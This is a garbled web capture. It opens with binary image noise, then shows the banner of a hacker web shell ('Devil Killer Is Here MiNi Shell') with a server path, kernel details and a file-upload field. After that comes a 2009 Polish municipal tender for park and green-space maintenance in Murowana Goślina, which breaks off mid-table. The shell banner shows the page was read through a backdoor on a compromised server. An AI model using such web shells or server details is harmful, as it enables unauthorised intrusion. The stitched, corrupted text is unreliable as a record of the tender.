JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27997-N-2009.html

<p class="kh_header"><b>Murowana Goślina: Świadczenie usług utrzymania zieleni na terenie Miasta i Gminy Murowana Goślina od dnia zawarcia umowy do dnia 31 grudnia 2009 roku.</b><br>
<b>Numer ogłoszenia: 27997 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murowana Goślina , ul. Poznańska 18, 62-095 Murowana Goślina, woj. wielkopolskie, tel. 061 8122055, 8122363, 8122379, faks 061 8122140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murowana-goslina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług utrzymania zieleni na terenie Miasta i Gminy Murowana Goślina od dnia zawarcia umowy do dnia 31 grudnia 2009 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług utrzymania zieleni na terenie Miasta i Gminy Murowana Goślina od dnia zawarcia umowy do dnia 31 grudnia 2009 roku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.34.00.00-5, 77.31.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 u.p.z.p.), tj.: posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;

b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 2 u.p.z.p.) lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności:
(1)	dysponują lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia nw. sprzętem i urządzeniami niezbędnymi do wykonania zamówienia dla każdej części przedmiotu zamówienia oddzielnie:
w części I
-	spalinową piłą łańcuchową,
-	2 kosami mechanicznymi z głowicą żyłkową,
-	rębakiem do gałęzi,
-	ręcznymi lub spalinowymi nożycami do przycinania żywopłotów,
-	zabudowany pojazd do transportu odpadów powstałych w wyniku wykonywanej działalności,
-	ręczną piłą do cięcia gałęzi.
w części II
-	beczkowozem z wężem do podlewania terenów zielonych,
-	spalinową piłą łańcuchową,
-	2 kosami mechanicznymi z głowicą żyłkową,
-	rębakiem do gałęzi,
-	ręcznymi lub spalinowymi nożycami do przycinania żywopłotów,
-	zabudowany pojazd do transportu odpadów powstałych w wyniku wykonywanej działalności,
-	ręczną piłą do cięcia gałęzi.

W celu potwierdzenia spełniania ww. warunku Wykonawca zobowiązany jest przedłożyć wykaz sporządzony według wzoru stanowiącego załącznik nr 3 do oferty. Wykaz winien zawierać szczegółowe informacje na temat wymaganego sprzętu; 
(2)	w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 1 usługę polegającą na utrzymaniu i pielęgnacji zieleni miejskiej przez okres co najmniej 6 miesięcy oraz potwierdzą, że prace te zostały wykonane należycie, zamówienia dla każdej części przedmiotu zamówienia oddzielnie.
W celu potwierdzenia spełniania ww. warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 4 do oferty oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie.
Przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców prace zostały wykonane należycie muszą potwierdzać spełnienie powyższego warunku;
b)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: 
(1)	zaakceptują 30-dniowy termin płatności;
c)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 u.p.z.p.;
d)	załączą - określone w ogłoszeniu o zamówieniu oraz w pkt. 10 SIWZ - dokumenty i oświadczenia potwierdzające spełnianie warunków, o których mowa w art. 22 ust. 1 i art. 24 Ustawy, których złożenia wymaga Zamawiający, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. (DzU nr 87 poz. 605) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane oraz rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 188, poz. 1155); 
e)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (np. konsorcjum) zobowiązani są do ustanowienia Pełnomocnika celem reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
f)	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zobowiązany jest do złożenia dokumentów zgodnie z §2 cytowanego w ppkt e) rozporządzenia.
2)	Opis sposobu dokonywania oceny spełniania warunków udziału 
w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu stosując ocenę zerojedynkową: spełnia _nie spełnia. Ocena spełniania ww. warunków dokonana zostanie w oparciu 
o informacje zawarte w dokumentach lub oświadczeniach załączonych do oferty. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)W celu wykazania spełnienia warunków udziału w postępowaniu opisanych w punkcie 9 SIWZ, wraz z ofertą wypełnioną na formularzu oferty każdy Wykonawca składa Zamawiającemu następujące dokumenty i oświadczenia:
a)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (oryginał lub kserokopia poświadczona za zgodność z oryginałem przez Wykonawcę), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
b)oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 u.p.z.p., stanowiące załącznik nr 1 do oferty (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia - oświadczenie ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku),
c)oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 u.p.z.p., stanowiące załącznik nr 2 do oferty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe oświadczenia dla każdego z nich),
d)pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt e) Wykonawca wskazał osoby, którymi będzie dysponował, 
e)wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający spełnienie warunku określonego postanowieniami pkt 9.1) lit. c)(2) SIWZ (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie). Wykaz należy sporządzić na podstawie wzoru stanowiącego załącznik nr 4 do formularza oferty,
f) dokumenty potwierdzające, że usługi wpisane do wykazu wykonanych usług zostały wykonane należycie,
g) wykaz sprzętu i urządzeń niezbędnych do wykonania zamówienia, jakimi dysponuje Wykonawca, sporządzony na podstawie wzoru stanowiącego załącznik nr 3 do formularza oferty dla każdego pakietu przedmiotu zamówienia oddzielnie. Wykaz winien zawierać informacje potwierdzające spełnienie warunku opisanego w pkt 9.1) lit. c) (1) SIWZ 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniany będzie ich łączny potencjał),
h) ponadto Wykonawca składa:
(1) dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 
(2) stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
2) Postanowienia dotyczące Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej 
w punkcie 1)lit. a) składa dokument lub dokumenty, wystawione kraju, 
w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
3) Dokumenty są składane w formie oryginału lub kopii poświadczonej ZA ZGODNOŚĆ Z ORYGINAŁEM przez Wykonawcę. Pełnomocnictwa należy złożyć w oryginale lub poświadczonej przez notariusza kopii. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym - jak wyżej - przez Wykonawcę.
4) Jeżeli termin składania ofert ulegnie przesunięciu, wówczas dokumenty, które do tego czasu utraciły swą ważność winny zostać uaktualnione.
5) Pożądane przez Zamawiającego jest złożenie w ofercie spisu treści..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http//www.murowana-goslina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. Poznańska 18, 
62-095 Murowana Goślina, pokój nr 32.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy
ul. Poznańska 18, 
62-095 Murowana Goślina, pokój nr 1 (kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) Zamawiający nie przewiduje:
a) udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 i 7 u.p.z.p.;
b) zawarcia umowy ramowej; 
c) rozliczeń w walucie obcej;
d) przeprowadzenia aukcji elektronicznej;
e) zwrotu kosztów udziału w postępowaniu. Wykonawcy ponoszą wszelkie koszty własne związane z przygotowaniem i złożeniem oferty, niezależnie od wyniku postępowania. Zamawiający w żadnym przypadku nie odpowiada za koszty poniesione przez Wykonawców w związku z przygotowaniem i złożeniem oferty. Wykonawcy zobowiązują się nie podnosić jakichkolwiek roszczeń z tego tytułu względem Zamawiającego, z zastrzeżeniem art. 93 ust. 4 u.p.z.p.
f) ustanowienia dynamicznego systemu zakupów.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1	Zadanie nr 1 polega na pielęgnacji rabat, trawników, krzewów i drzew w miejscach i na ich powierzchniach określonych w załączniku nr 1.
1.1.1	W zakresie pielęgnacji żywopłotów wymaga się:
1.1.1.1	odchwaszczenia tj. spulchnienia ziemi i opielenia żywopłotów. Wyrwane chwasty należy zebrać i wywieźć tego samego dnia po wykonanej pracy. Częstotliwość prac określa się raz na 2 tygodnie w okresie od 15 kwietnia do końca września.
1.1.1.2	cięć pielęgnujących i formujących krzewy - cięcia nożycami ręcznymi krzewu do wysokości 1 metra lub do wysokości 1,5 metra nad poziomem gruntu. Zebranie gałęzi i ich wywóz tego samego dnia po wykonanej pracy. Częstotliwość prac raz na 5 tygodni w okresie od pierwszego maja do końca września.  
1.1.2	W zakresie pielęgnacji drzew wymaga się:
1.1.2.1	Formowania tj. czynności polegającej na przycięciu odrostów. Gałęzie drzew zwisających nad ciągami pieszo-rowerowymi należy podciąć na wysokość 3 metrów nad poziomem gruntu, a przy jezdni 5 metrów nad poziomem jezdni. Należy także usuwać odrosty korzeniowe przy drzewach w następujący sposób: nie można uszkodzić pnia głównego, przycinanie musi nastąpić na wysokości nie wyższej niż 5 cm od powierzchni ziemi, po wykonaniu cięć należy pozostawić jeden pień główny drzewa, niedopuszczalne jest wyprowadzenie kilku przewodników. Formowanie należy wykonać raz w roku poza okresem wegetacyjnym. Usunięte gałęzie i opadłe liście należy wywieźć i uprzątnąć teren tego samego dnia po wykonanej pracy.
1.1.2.2	Wymaga się od Wykonawcy podlewania 64 drzew nasadzonych przy boisku sołeckim w Rakowni w 2007 w ilości 15 litrów na jedno drzewo w okresie od 1 czerwca do końca października z częstotliwością co 14 dni.
1.1.3	W zakresie pielęgnacji trawników wymaga się:
1.1.3.1	Założenia trawników w okresie wczesnowiosennym o łącznej powierzchni 530 metrów wzdłuż ul. Poznańskiej w następujących miejscach:
-	skwer przy skrzyżowaniu z ul. Wojska Polskiego (powierzchnia ok. 30 m),
-	tereny wzdłuż ścieżki pieszo-rowerowej na odcinku pomiędzy ul. Łąkową i ul. Długą (powierzchnia ok. 500 m).
1.1.3.2	Wiosennego oraz jesiennego wygrabienia opadłych liści z drzew oraz  ich wywiezienia tego samego dnia po wykonanej pracy. Częstotliwość prac - raz w marcu oraz 4 razy co trzy tygodnie w okresie od połowy września do końca listopada.
1.1.3.3	Koszenia mechanicznego trawy z terenów płaskich i skarp: tereny zielone wzdłuż ulicy Poznańskiej i Rogozińskiej - co 14 dni na wysokość do 7 cm w okresie od 15 kwietnia do 15 października. Na terenach pozostałych, określonych w załączniku 1- co 14 dni na wysokość do 7 cm w okresie od 15 kwietnia do końca września. Skoszoną trawę należy natychmiast zebrać i wywieźć tego samego dnia po wykonanej pracy. Koszenie trawy obejmuje również trawniki obsadzone drzewami i krzewami. 
1.1.4	W zakresie pielęgnacji istniejących rabat:
1.1.4.1	Pielęgnacja istniejących rabat polega na obcinaniu sekatorem przekwitłych kwiatostanów, zbędnych i martwych pędów oraz ręczne wybranie chwastów i śmieci. Częstotliwość prac 1 raz na 2 tygodnie w okresie od 1 maja do końca października. Wywóz odpadów tego samego dnia po wykonanej pracy.
1.1.5	Wymaga się od Wykonawcy Zadania 1 skoszenia trawy rosnącej przy przejeździe kolejowym na ul. Przemysłowej, Polnej, droga z Przebędowa do Głębocka, droga w Głębocku i ul. Brackiej (tzw. trójkąty widoczności). Obszar do wycięcia: 4 metry wzdłuż drogi i 10 metrów wzdłuż torów kolejowych. W sumie na każdym z przejazdów należy wyciąć 160 m2 chwastów. Skoszone chwasty należy tego samego dnia zebrać i wywieźć. Częstotliwość 5 razy w roku - usługa na hasło.
1.1.6	Wymaga się od Wykonawcy Zadania 1 utrzymywania czystości na terenach określonych w Załączniku 1 z trawników i krzewów należy do godziny 8:00 każdego dnia wyzbierać odpady (papierki, folie, butelki szklane, plastikowe etc.). Odpady należy zebrać do worków foliowych i niezwłocznie przewieźć na składowisko odpadów komunalnych w Białęgach. Utrzymywanie czystości należy prowadzić przez 6 dni w tygodniu, od poniedziałku do soboty.
1.1.7	Wymaga się od Wykonawcy Zadania 1 skoszenia traw i trzcin wzdłuż tzw. czarnej drogi między ulicą Łąkową a osiedlem Zielone Wzgórza. Wykoszenia trawy należy wykonać na dwa metry w głąb trzcinowiska, licząc od granicy porastania roślinności po obu stronach drogi. Skoszoną trawę należy tego samego dnia zebrać i wywieźć. Częstotliwość prac raz na miesiąc. 
1.1.8	Wymaga się do Wykonawcy Zadania 1 na dzień przed imprezami gminnymi     i uroczystościami takimi jak: Jarmark Świętego Jakuba, MTB Marathon, Mistrzostwami Polski Weteranów w Półmaratonie i Boże Ciało, Święto Niepodległości, Święto Narodowe 3 maja uprzątnięcia terenów zielonych wzdłuż ulicy Poznańskiej i Rogozińskiej tj.: wykoszenia i zgrabienia trawy, zgrabienia liści oraz wyzbierania śmieci. Zebrane odpady należy niezwłocznie wywieźć po zakończeniu prac,
1.1.9	Transport wszelkich odpadów należy prowadzić w sposób nie powodujący zanieczyszczenia tras. W przypadku zanieczyszczenia trasy, odpady należy natychmiast zebrać. 
W momencie powstania kompostowni na terenie gminy, odpady powstałe podczas pielęgnacji trawników, krzewów i drzew, należało będzie przekazywać na kompostownię.
Zamawiający zastrzega sobie prawo do zmiany miejsca wykonywania usługi, poprzez zamianę lub dodanie nowych powierzchni na terenie Miasta i Gminy Murowana Goślina objętych pracami pielęgnacyjnymi. Zmiany lokalizacji nie mogą spowodować przekroczenia łącznych powierzchni terenów zielonych oraz ilości drzew określonych w niniejszym opisie przedmiotu zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.34.00.00-5, 77.31.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 polega na utrzymaniu zieleni tj. pielęgnacji trawników, krzewów, drzew, rabat oraz kwiatów w pojemnikach na terenie i w zakresie określonym w załączniku nr 2. 
1.1.1.	W zakresie pielęgnacji żywopłotów wymaga się:
1.1.1.1.	odchwaszczenia tj. spulchnienia ziemi i opielenia żywopłotów. Wyrwane chwasty należy zebrać i wywieźć tego samego dnia po wykonanej pracy. Częstotliwość prac określa się raz na dwa tygodnie w okresie od 15 kwietnia do połowy października.
1.1.1.2.	cięć pielęgnujących i formujących krzewy - cięcia nożycami ręcznymi krzewu do wysokości 1 metra lub do wysokości 1,5 metra nad poziomem gruntu. Zebranie gałęzi i ich wywóz tego samego dnia po wykonanej pracy Częstotliwość prac raz na 5 tygodni w okresie od 15 kwietnia do końca września.  
1.1.2.	W zakresie pielęgnacji drzew wymaga się:
1.1.2.1.	Formowania tj. czynności polegającej na przycięciu odrostów. Gałęzie drzew zwisających nad ciągami pieszo-rowerowymi  oraz nad placem zabaw przy Przedszkolu Promyk należy podciąć na wysokość 3 metrów nad poziomem gruntu, a przy jezdni 5 metrów nad poziomem jezdni. Należy także usuwać odrosty korzeniowe przy drzewach w następujący sposób: nie można uszkodzić pnia głównego, przycinanie musi nastąpić na wysokości nie wyższej niż 5 cm od powierzchni ziemi, po wykonaniu cięć należy pozostawić jeden pień główny drzewa, niedopuszczalne jest wyprowadzenie kilku przewodników. Formowanie należy wykonać raz w roku poza okresem wegetacyjnym. Usunięte gałęzie i opadłe liście należy wywieźć i uprzątnąć teren tego samego dnia po wykonanej pracy.
1.1.3.	W zakresie pielęgnacji trawników wymaga się
1.1.3.1.	Założenia trawników w okresie wczesnowiosennym o łącznej powierzchni około 40 metrów na Placu Powstańców Wielkopolskich przy tablicy informacyjnej oraz wzdłuż ul. Poznańskiej.
1.1.3.2.	Wiosennego i jesiennego wygrabienia opadłych liści z drzew i krzewów oraz ich wywiezienia tego samego dnia po wykonanej pracy. W Parku Miejskim i na Placu Powstańców Wielkopolskich określa się częstotliwość prac: 5 razy co 10 dni w okresie od 15 września do końca października. Tereny pozostałe określone w załączniku nr 2 częstotliwość prac - raz w marcu oraz 4 razy co trzy tygodnie w okresie od połowy września do końca listopada. 
1.1.3.3.	Koszenia mechanicznego trawy z terenów płaskich i skarp: w Parku Miejskim, wokół budynków Urzędu i na Placu Powstańców Wlkp co 10 dni na wysokość do 7 cm w okresie od 10 kwietnia do 15 października. Na pozostałych terenach zielonych wymienionych w załączniku nr 2 co 14 dni na wysokość do 7 cm w okresie od 15 kwietnia do 30 września. Skoszoną trawę należy natychmiast zebrać i wywieźć tego samego dnia po wykonanej pracy. Koszenie trawy obejmuje również trawniki obsadzone drzewami i krzewami. 
1.1.4.	W zakresie pielęgnacji 3 pojemników na ul. Przelotowej wymaga się:
1.1.4.1.	Obsadzenia pojemników berberysami.
1.1.4.2.	 Pielęgnacji tj. obcinania sekatorem zbędnych i martwych pędów, wykonywania cięć formujących oraz ręcznego wybrania chwastów i śmieci. Częstotliwość prac 3 razy na tydzień w okresie od 1 maja do końca października. Wywóz odpadów tego samego dnia po wykonanej pracy.
1.1.5.	W zakresie pielęgnacji 13 pojemników z kwiatami jednorocznymi na Placu Powstańców Wielkopolskich wymaga się:
1.1.5.1.	Przygotowania pojemnika do obsadzenia tj.: wybrania chwastów, uzupełnienia ewentualnych braków ziemi, nawiezienia ziemi granulowanym nawozem mineralnym w ilości 8 kg/100m2, przekopania ziemi z nawozem w pojemniku. Zebranie chwastów oraz ich wywiezienie tego samego dnia po wykonanej pracy.
1.1.5.2.	Obsadzenia pojemników kwiatami jednorocznymi (kolor zostanie ustalony z pracownikiem Urzędu): 

I sadzenie	II sadzenie
Bratek - 170
